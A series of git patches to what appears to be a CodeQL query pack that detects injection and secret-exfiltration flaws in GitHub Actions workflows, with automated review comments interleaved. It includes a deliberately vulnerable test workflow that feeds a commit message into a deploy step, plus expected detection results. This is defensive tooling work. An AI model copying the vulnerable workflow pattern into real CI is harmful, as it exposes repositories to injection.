| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 000000000000..cd179c0f1e6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + From 25eace71bf1d327464b57db88cfaabc5f27d82d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:08:41 +0200 Subject: [PATCH 173/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5b3952ce96b..ff8e02aa63e1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.10 +version: 0.0.11 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7c1cc78df4a3..c769ea06d0b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.10 +version: 0.0.11 groups: - actions - queries From 9ecda65e32762519d4c2d89b309cb8a6532b7073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 16 Apr 2024 11:41:53 +0200 Subject: [PATCH 174/707] Update Priv workflow definition --- ql/lib/codeql-pack.lock.yml | 16 ---- ql/lib/codeql/actions/Ast.qll | 13 ++- .../.github/workflows/documentation.yml | 87 +++++++++++++++++++ .../CWE-078/CommandInjection.expected | 1 + .../PrivilegedCommandInjection.expected | 2 + .../CWE-094/.github/workflows/inter-job4.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 2 + .../CWE-094/PrivilegedCodeInjection.expected | 2 - 8 files changed, 102 insertions(+), 23 deletions(-) delete mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c7..000000000000 --- a/ql/lib/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index edee4d03eb4c..7e1bfdee589a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -208,19 +208,21 @@ class Workflow extends AstNode instanceof WorkflowImpl { predicate hasSingleTrigger(string trigger) { this.getATriggerEvent() = trigger and - count(string t | this.getATriggerEvent() = t | t) = 1 + count(this.getATriggerEvent()) = 1 } predicate isPrivileged() { // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" and + this.getPermissions().getAPermission() = "write" + or // The Workflow accesses a secret exists(SecretsExpression expr | expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or // The Workflow is triggered by an event other than `pull_request` - not this.hasSingleTrigger("pull_request") + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -228,8 +230,11 @@ class Workflow extends AstNode instanceof WorkflowImpl { exists(ExternalJob call, Workflow caller | call.getCallee() = this.getLocation().getFile().getRelativePath() and caller = call.getWorkflow() and - not caller.hasSingleTrigger("pull_request") + caller.isPrivileged() ) + or + // The Workflow has multiple triggers so at least one is ont "pull_request" + count(this.getATriggerEvent()) > 1 } } diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml new file mode 100644 index 000000000000..46ffbce96280 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml 
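Review bot: The comment on the new last disjunct of `isPrivileged` reads `// The Workflow has multiple triggers so at least one is ont "pull_request"`; `ont` should be `not`. Beyond the typo, that branch classifies every multi-trigger workflow as privileged, including `on: [pull_request, workflow_call]`, whereas a lone `workflow_call` trigger is only privileged when its caller is, so the two count-based branches treat the same trigger differently depending on what it is paired with; if that is unintended, both could collapse into `exists(string t | t = this.getATriggerEvent() | not t = ["pull_request", "workflow_call"])` with the caller-based branch still covering `workflow_call`. Replacing `not caller.hasSingleTrigger("pull_request")` with `caller.isPrivileged()` makes the predicate recursive through `ExternalJob`, which is fine in QL but deserves a one-line comment so the next reader does not take it for a mistake. The enclosing `class Workflow` begins before the first hunk and `hasSingleTrigger` is now unused by this predicate.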
@@ -0,0 +1,87 @@ +name: Documentation + +on: + workflow_dispatch: + workflow_call: + +jobs: + parse_commit_info: + runs-on: ubuntu-latest + outputs: + can_deploy: ${{ steps.decide.outputs.can_deploy }} + deploy_to: ${{ steps.decide.outputs.deploy_to }} + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Copy build utils + run: | + cp -r .github/utils ../utils + + - name: Decide Whether to Build and/or Release + id: decide + run: | + set -xe + CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation) + DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation) + + echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT + echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT + echo github.ref ${{ github.ref }} + + build-documentation: + runs-on: ubuntu-latest + needs: parse_commit_info + + strategy: + matrix: + python-version: [3.11] + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + + - name: Install Quarto + uses: quarto-dev/quarto-actions/setup@v2 + with: + version: pre-release + + - name: Install Package + shell: bash + run: | + make doc-deps + + - name: Environment Information + shell: bash + run: | + ls -la + ls -la doc + pip list + + - name: Build docs + shell: bash + run: | + pushd doc; make doc; popd + + - name: Environment Information + shell: bash + run: | + ls -la doc + cat doc/_variables.yml + ls -la doc/reference + + - name: Deploy to Documentation to a Branch + uses: JamesIves/github-pages-deploy-action@v4 + if: contains(needs.parse_commit_info.outputs.can_deploy, 'true') + with: + folder: doc/_site + branch: ${{ needs.parse_commit_info.outputs.deploy_to }} + commit-message: ${{ github.event.head_commit.message }} 
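Review bot: The fixture gives no hint of why it belongs in the privileged test set or which sink it exercises; a header comment such as `# Test: two triggers (workflow_dispatch + workflow_call) make the workflow privileged; github.event.head_commit.message flows into the commit-message input of github-pages-deploy-action` would tie it to the rows added to PrivilegedCommandInjection.expected in this commit. Whether `github.event.head_commit` is populated at all under these triggers depends on the calling event, so the comment could also state that the payload field is used only to exercise the source, not as a realistic run.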
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index 99ebb1edc05d..ebbf2f7cf0b2 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -1,5 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 13d146a2570f..8829557368bb 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected 
@@ -1,6 +1,8 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index aad2d171c1af..b964bb78dac3 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index c9f814139a00..f242e0e9e689 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -234,4 +234,6 @@ nodes subpaths #select | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 35b27172db67..ec9a5e5238a9 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -236,8 +236,6 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From d1a4d18fca36aab804ce643d14db1c246c34c7c3 Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Tue, 16 Apr 2024 21:33:50 +0200 Subject: [PATCH 175/707] Add composite actions summaries and sources --- .../apache_incubator-kie-tools.model.yml | 6 ++++++ .../aws-powertools_powertools-lambda-python.model.yml | 6 ++++++ .../composite-actions/drawpile_drawpile.model.yml | 7 +++++++ .../elastic_apm-server.model copy.yml | 7 +++++++ .../composite-actions/flagsmith_flagsmith.model.yml | 6 ++++++ .../googlecloudplatform_dataflowtemplates.model.yml | 11 +++++++++++ .../composite-actions/hashicorp_vault.model.yml | 8 +++++++- .../jhipster_generator-jhipster.model.yml | 7 ++++++- .../composite-actions/linkerd_linkerd2.model.yml | 9 ++++++++- .../generated/composite-actions/novuhq_novu.model.yml | 7 ++++++- .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++- .../generated/composite-actions/saltstack_salt.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- 13 files changed, 88 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml create mode 100644 ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 000000000000..37f3efbededb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
new file mode 100644
index 000000000000..6dffbff40d31
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml
new file mode 100644
index 000000000000..63085c045d0a
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"]
+ - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml
new file mode 100644
index 000000000000..023abac3631d
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml
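Review bot: The new `apache_incubator-kie-tools.model.yml` declares `extensible: sinkModel` but its only row has the six-column summary shape (`"input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"`), whereas every sinkModel row elsewhere in this series has five columns ending in a sink kind such as `"code-injection"`. As written the row is a taint step registered under the wrong extensible, so it will neither act as a sink nor as a summary; the header should read `extensible: summaryModel`, matching the sibling files added in this commit. The file is also the only new one in this hunk without a trailing newline.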
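Review bot: The hand-written summary rows in `aws-powertools_powertools-lambda-python.model.yml` are tagged `"manual"` yet live under `ql/lib/ext/generated/`, alongside rows tagged `"generated"`. If that directory is produced by a generator (which is only an inference from its name and the provenance column), a regeneration run could silently drop these manual summaries and with them the taint propagation they model; either keep manual rows in a non-generated location or document that the generator merges rather than overwrites. The same applies to every `summaryModel` and `sourceModel` row tagged `"manual"` in this patch and the following one (PATCH 176).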
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"]
+ - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml
new file mode 100644
index 000000000000..37e1d0d67a5e
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
new file mode 100644
index 000000000000..ab1cac6b6919
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
index bcd6e0eda315..ba213f0363bb 100644
--- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
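Review bot: The new file is named `elastic_apm-server.model copy.yml`, with a space and a " copy" suffix, while every other model file in this directory follows `<owner>_<repo>.model.yml`; this looks like a file-manager duplicate that was committed by accident. Rename it to `elastic_apm-server.model.yml`, or merge its two `input.version` summary rows into that file if it already exists (not visible from this hunk). A loader that globs on `*.model.yml` will still pick the file up, so the mismatch would be easy to miss later.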
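Review bot: `googlecloudplatform_dataflowtemplates.model.yml` contains only rows for `googlecloudplatform/magic-modules`, and the diffstat of the following patch (PATCH 177) lists a separate `googlecloudplatform_magic-modules.model.yml`, so the content appears to have landed in the wrong file. If the rows really belong to magic-modules, move both the `inputs.repo` sink row and the `output.changed-files` source row into that file and drop this one; if they were meant for dataflowtemplates, the first column of both rows is wrong. The sink row is also the only one in this commit tagged `"generated"` inside a hand-written file, which is worth confirming.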
@@ -4,4 +4,10 @@ extensions:
 extensible: sinkModel
 data:
 - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"]
- - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"]
+ - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
index 6dd3ac94306a..f1b5e6df222e 100644
--- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
+++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
@@ -19,4 +19,9 @@ extensions:
 - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"]
 - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"]
 - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"]
- - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"]
\ No newline at end of file
+ - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
index 234f13b73871..e86f7432a48a 100644
--- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
+++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
@@ -6,4 +6,11 @@ extensions:
 - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"]
 - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"]
 - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"]
- - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"]
\ No newline at end of file
+ - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"]
+ - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"]
+ - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
index f305e2a37b34..48203004ed58 100644
--- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
+++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"]
\ No newline at end of file
+ - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
index 8b45d92a5e0e..3122d89f28f8 100644
--- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
+++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
@@ -4,4 +4,9 @@ extensions:
 extensible: sinkModel
 data:
 - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"]
- - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"]
\ No newline at end of file
+ - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml
new file mode 100644
index 000000000000..963518a34784
--- /dev/null
+++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
index b56944cd0ff7..21ea7ef13a98 100644
--- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
+++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"]
\ No newline at end of file
+ - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"]
From 463a7a60629eda2e88024ff90b40babdd5ae6bb8 Mon Sep 17 00:00:00 2001
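Review bot: The new file `saltstack_salt.yml` drops the `.model` segment used by every other model file here, and the diffstat of the following patch (PATCH 177) lists a `saltstack_salt.model.yml` that appears to sit in the same `composite-actions` directory, so this commit creates a second, differently named file for the same action instead of extending the existing one. The single `input.version -> output.version` summary row should be appended to `saltstack_salt.model.yml` as a new `addsTo` block, in the same way this commit extends `hashicorp_vault.model.yml` and `novuhq_novu.model.yml`. If the loader selects files by the `.model.yml` suffix, the row as committed would never be loaded at all.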
